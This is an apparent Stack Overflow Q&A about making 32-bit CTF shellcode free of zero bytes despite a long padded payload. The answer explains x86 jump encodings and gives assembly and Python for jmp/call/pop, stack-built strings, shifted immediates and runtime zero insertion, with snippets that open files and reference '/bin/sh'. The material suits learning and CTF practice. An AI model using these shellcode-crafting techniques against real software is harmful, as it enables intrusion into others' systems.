I am trying to write shellcode for a CTF challenge that does not allow for 0x00 bytes (it will be interpreted as a terminator). Due to restrictions in the challenge, I must do something like this:
[shellcode bulk] [(0x514 - sizeof(shellcode bulk)) filler bytes] [fixed constant data to overwrite global symbols] [shellcode data]
It looks something like this:
.intel_syntax noprefix
.code32
shellcode:
    jmp sc_data
shellcode_main:
    #open
    xor eax, eax
    pop ebx             //file string
    xor ecx, ecx        //flags
    xor edx, edx        //mode
    mov al, 5           //sys_OPEN
    int 0x80
    ...                 // more shellcode
    .org 514, 0x41      // filler bytes
    .long 0xffffffff    // bss constant overwrite
sc_data:
    call shellcode_main
    .asciz "/path/to/fs/file"
This works beautifully if sc_data is within 127 bytes of shellcode. In this case the assembler (GAS) will output a short jump of format:
Opcode   Mnemonic
EB cb    JMP rel8
However, since I have a hard restriction that I need 0x514 bytes for the bulk shellcode and filler bytes, this relative offset will need at least 2 bytes. This would also work because there is a 2-byte relative encoding for the jmp instruction:
Opcode   Mnemonic
E9 cw    JMP rel16
Unfortunately, GAS does not output this encoding. Rather it uses the 4-byte offset encoding:
Opcode   Mnemonic
E9 cd    JMP rel32
This results in two MSB bytes of zeros. Something similar to:
e9 01 02 00 00
My question is: can GAS be forced to output the 2-byte variant of the jmp instruction? I toyed around with multiple smaller 1-byte jmps, but GAS kept outputting the 4-byte variant. I also tried invoking GCC with -Os to optimize for size, but it insisted on using the 4-byte relative offset encoding.
Intel jump opcode defined here for reference.
jmp rel16 is only encodable with an operand-size of 16, which truncates EIP to 16 bits. (The encoding requires a 66 operand-size prefix in 32 and 64-bit mode.) As described in the instruction-set reference you linked, or in this more up-to-date PDF->HTML conversion of Intel's manual, EIP ← tempEIP AND 0000FFFFH; when the operand-size is 16. This is why assemblers never use it unless you manually request it (see footnote 1), and why you can't use jmp rel16 in 32 or 64-bit code except in the very unusual case where the target is mapped in the low 64kiB of virtual address space (see footnote 2).
The only reason you're jumping forward is to reach a call rel32 that pushes the address of your data, because you want that data all the way at the end of your long padded payload. You can get a pointer to your data without that jump.
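To see why only the forward jump is a problem, here is a minimal Python sketch that hand-encodes the two rel32 instructions. The offsets (a jmp at offset 0, the call at offset 0x206, shellcode_main at offset 2) are assumptions chosen to reproduce the e9 01 02 00 00 bytes from the question, not values taken from the real payload.

```python
import struct

def jmp_rel32(src: int, dst: int) -> bytes:
    """Encode E9 cd. The displacement is relative to the end of the 5-byte instruction."""
    return b"\xe9" + struct.pack("<i", dst - (src + 5))

def call_rel32(src: int, dst: int) -> bytes:
    """Encode E8 cd, with the same displacement rule as jmp rel32."""
    return b"\xe8" + struct.pack("<i", dst - (src + 5))

# Assumed layout: jmp at offset 0, call at offset 0x206, call target at offset 2.
forward = jmp_rel32(0, 0x206)      # small positive displacement: high bytes are 00
backward = call_rel32(0x206, 2)    # small negative displacement: high bytes are ff

print(forward.hex(), "contains zero byte:", 0 in forward)
print(backward.hex(), "contains zero byte:", 0 in backward)
```

A small positive displacement sign-extends with 00 bytes, while a small negative one sign-extends with ff bytes, so backward calls and jumps are usually safe in a zero-free payload.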
You could construct a string on the stack with push imm32/imm8/reg and mov ebx, esp. (You already have a zeroed register you can push for the terminating zero byte.)
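As a rough illustration of the stack-string approach, the following Python sketch generates the machine code for push eax, a series of push imm32, and mov ebx, esp. The helper name push_string is hypothetical, and it assumes EAX is already zero and that the path is absolute, so it can be padded with extra leading slashes to a multiple of 4 bytes.

```python
def push_string(path: bytes) -> bytes:
    """Build 32-bit code that leaves EBX pointing at a zero-terminated copy of path.

    Assumptions: EAX == 0 on entry, and path starts with '/' so that
    padding with extra leading slashes does not change its meaning on Linux.
    """
    if not path.startswith(b"/") or 0 in path:
        raise ValueError("need an absolute path without zero bytes")
    padded = b"/" * (-len(path) % 4) + path
    code = b"\x50"                           # push eax: terminating zero dword
    for i in range(len(padded) - 4, -1, -4):
        code += b"\x68" + padded[i:i + 4]    # push imm32: last chunk goes first
    code += b"\x89\xe3"                      # mov ebx, esp
    return code

code = push_string(b"/path/to/fs/file")
print(code.hex(), "length:", len(code))
```

Because push imm32 stores its immediate little-endian, the four immediate bytes land in memory in the same order they appear in the instruction, so the chunks only need to be pushed in reverse.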
If you don't want to construct data on the stack, and instead use data that's part of your payload, use position-independent code / relative addressing for it. Perhaps you have a value in a register that's a known offset from EIP, e.g. if your exploit code was reached with a jmp esp or other ret-2-reg attack. In that case, you might be able to just mov ecx, 0x12345678 / shr ecx, 16 / lea ebx, [esp+ecx].
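The mov / shr trick works because the low bits of the immediate are shifted out, so they can be filled with ones, and the shift count can be chosen so that no byte of the immediate is zero. A minimal Python sketch of that arithmetic follows; the function name shifted_imm is hypothetical, and the offsets 0x514 and 0x100 are only examples.

```python
import struct

def shifted_imm(offset: int, shift: int) -> bytes:
    """Encode mov ecx, imm32 / shr ecx, shift so that ECX ends up equal to offset.

    Raises ValueError if the resulting machine code would contain a zero byte.
    """
    if not 0 < shift < 32:
        raise ValueError("shift must be between 1 and 31")
    imm = (offset << shift) | ((1 << shift) - 1)   # low bits are discarded by shr
    if imm >> 32:
        raise ValueError("offset does not fit with this shift")
    # b9 id = mov ecx, imm32 ; c1 e9 ib = shr ecx, imm8
    code = b"\xb9" + struct.pack("<I", imm) + b"\xc1\xe9" + bytes([shift])
    if 0 in code:
        raise ValueError("zero byte remains; try another shift count")
    return code

print(shifted_imm(0x514, 16).hex())   # 0x0514ffff has no zero bytes
print(shifted_imm(0x100, 17).hex())   # shift 16 would leave a zero byte, 17 does not
```

With the offset in ECX, lea ebx, [esp+ecx] (8d 1c 0c) adds it to the base register without any displacement bytes at all.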
Or, if you had to use a NOP sled and you don't know the exact value of EIP relative to any register value, you can obtain the current value of EIP with a call instruction with a negative displacement. Jump forward over the call target, then call back to it. You can put data right after that call. (But avoiding zero bytes in the data is inconvenient; you can store some once you get a pointer to it.)
# Position-independent 32-bit code to find EIP
# and get label addresses into registers
# and insert zeros into data that we jumped over.

    jmp  .Lcall
.Lget_eip:
    pop  ebx
    jmp  .Lafter_call        # jmp rel8
.Lcall:
    call .Lget_eip           # backward rel32 = 0xffffff??
    # execution never returns here
.Lmsg:
    .ascii "/path/to/fs/file/"    # last byte to be overwritten
    msglen = . - .Lmsg
.Loffset_data2:
    .long .Ldata2 - .Lmsg    # relative offset to other data, or make this a 16-bit int to avoid zeros
    # max data size 127 - 5 bytes

.Lafter_call:
    # EBX = OFFSET .Lmsg just from the call + pop

    # Insert a zero at runtime because the data wasn't at the end of the payload
    mov  byte ptr [ebx + msglen - 1], al      # with al=0

    # ESI = OFFSET .Ldata2 using an offset loaded from memory
    mov  esi, ebx
    add  esi, [ebx + .Loffset_data2 - .Lmsg]  # [ebx + disp8]

    # with an immediate displacement, avoiding zero bytes
    mov  ecx, ((.Ldata3 - .Lmsg) << 17) | 0xffff
    shr  ecx, 17             # choose shift count to avoid high zeros
    lea  edi, [ebx + ecx]    # edi = OFFSET .Ldata3

    # if disp8 doesn't work but 8 * disp8 does: small code size
    push (.Ldata3 - .Lmsg)>>3     # push imm8: offset / 8, to match the *8 scale below
    pop  ecx
    lea  edi, [ebx + ecx*8 + ((.Ldata3 - .Lmsg)&7)]   # disp8 of the low 3 bits

    ...
# at the end of your payload
.Ldata2:
    whatever you want, arbitrary size
.Ldata3:
In 64-bit code, it's much easier:
# In 64-bit code
    jmp  .Lafter_data
.Lmsg1:
    .ascii "/foo/bar/"       # last bytes to be replaced
.Lmsg2:
    .ascii "/bin/sh/"
.Lafter_data:
    lea  rdi, [RIP + .Lmsg1]             # negative rel32
    lea  rsi, [rdi + .Lmsg2 - .Lmsg1]    # disp8
    xor  eax, eax
    mov  byte ptr [rsi - 1], al          # insert zeros
    mov  byte ptr [rsi + len], al
Or use a RIP-relative LEA to get a label address and use some zero-avoiding method to add an immediate constant to it to get the address of a label at the end of your payload.
.Lbase:
    lea  rdi, [RIP + .Lbase]
    xor  ecx, ecx
    mov  cx, .Lpath - .Lbase
    add  rdi, rcx            # RDI = .Lpath address
    ...
    syscall

    ...                      # more than 128 bytes
.Lpath:
    .asciz "/foo/bar"
If you really needed to jump far, instead of just position-independent addressing of far-away "static" data, a chain of short forward jumps would work. Or use any of the above methods to find the address of a later label in a register, and use an indirect jump through that register (e.g. jmp eax).
In your case, saving code size doesn't help you avoid long jump displacements, but it probably will for some other people.
You can save code bytes using these Tips for golfing in x86/x64 machine code:
cdq (1 byte) zeroes EDX when EAX is known to be non-negative, which saves 1 byte vs. xor edx, edx.
xor ecx, ecx / mul ecx zeroes three registers in 4 bytes (ECX and EDX:EAX).
For this int 0x80 setup, the best choice is probably xor ecx,ecx (2B) / lea eax, [ecx+5] (3B) / cdq (1B), and don't use mov al,5 at all. You can put arbitrary small constants in registers in only 3 bytes with push imm8 / pop, or with one lea if you have another register with a known value.
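The size difference can be checked by counting bytes. This Python sketch lists one valid hand-assembled 32-bit encoding for each instruction (an assembler may pick an equivalent encoding of the same length) and compares the register setup from the question with the shorter sequence suggested above. The pop ebx is the same in both and is left out.

```python
# (mnemonic, hex encoding) pairs, hand-assembled for 32-bit mode.
QUESTION_SETUP = [
    ("xor eax, eax", "31c0"),
    ("xor ecx, ecx", "31c9"),
    ("xor edx, edx", "31d2"),
    ("mov al, 5",    "b005"),
]
GOLFED_SETUP = [
    ("xor ecx, ecx",     "31c9"),
    ("lea eax, [ecx+5]", "8d4105"),   # EAX = 0 + 5, upper bytes cleared too
    ("cdq",              "99"),       # EDX = sign bit of EAX = 0
]

def assemble(sequence):
    """Concatenate the listed encodings into one byte string."""
    return b"".join(bytes.fromhex(encoding) for _, encoding in sequence)

for name, seq in (("question", QUESTION_SETUP), ("golfed", GOLFED_SETUP)):
    code = assemble(seq)
    print(name, code.hex(), len(code), "bytes, zero-free:", 0 not in code)
```

Both sequences leave EAX = 5 and ECX = EDX = 0, and neither contains a zero byte.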
Footnote 1: asking your assembler to encode jmp rel16 outside of 16-bit mode:
NASM (in 16, 32 or 64-bit mode)
addr:
  ; times 256 db 0       ; padding to make it jump farther.
  o16 jmp near addr      ; force 16-bit operand-size and near (not short) displacement
objdump -d decodes it as jmpw. For the above NASM source assembled into a 32-bit static ELF binary, objdump -drwC foo shows the truncation of EIP:
0000000000400080 <addr>:
  400080:   66 e9 fc ff   jmpw   80 <addr-0x400000>
But GAS seems to think that mnemonic is only for indirect jumps (where it would mean a 16-bit load). It warns foo.S:5: Warning: indirect jmp without '*', and this GAS source: .org 1024; addr: .zero 128; jmpw addr gives you
 480:   66 ff 25 00 04 00 00   jmpw   *0x400
            483: R_386_32   .text
See "What is jmpl instruction in x86?" for more on this insane inconsistency in how GAS handles AT&T syntax. A plain jmp 0x400 when assembling in 16-bit mode would be a relative jump to that absolute offset.
In the extremely unlikely case you wanted a jmp rel16 in other modes, you'd have to assemble it yourself with .short. I don't think there's even a way to get the assembler to emit it for you.
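For reference, the hand-assembled bytes are easy to compute. This Python sketch (function names are hypothetical) encodes 66 E9 cw and models the EIP truncation. With the addresses from the objdump output above, it reproduces both the 66 e9 fc ff bytes and the truncated target 0x80.

```python
import struct

def jmp_rel16(src: int, dst: int) -> bytes:
    """Encode 66 E9 cw for 32/64-bit mode. The instruction is 4 bytes long."""
    disp = (dst - (src + 4)) & 0xFFFF
    return b"\x66\xe9" + struct.pack("<H", disp)

def truncated_target(src: int, code: bytes) -> int:
    """Where execution actually goes: EIP is masked to 16 bits after adding disp."""
    (disp,) = struct.unpack("<h", code[2:4])
    return (src + 4 + disp) & 0xFFFF

code = jmp_rel16(0x400080, 0x400080)   # jump-to-self, as in the NASM example
print(code.hex(), hex(truncated_target(0x400080, code)))
```

The intended target 0x400080 is unreachable because the upper 16 bits of EIP are cleared, which is why the encoding is useless for this payload even though its bytes are zero-free.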
Footnote 2: You can't use jmp rel16 in 32/64-bit code, unless you're attacking some code mapped in the low 64kiB of virtual address space, e.g. maybe something running under DOSEMU or WINE. Linux's default setting for /proc/sys/vm/mmap_min_addr is 65536, not 0, so normally nothing can mmap that memory even if you want to, or presumably load its text segment at that address via the ELF program loader. (So NULL-pointer dereferences with an offset segfault instead of silently accessing memory.)
You can be sure that your CTF target won't happen to be running with EIP = IP, and that truncating EIP to IP will just segfault.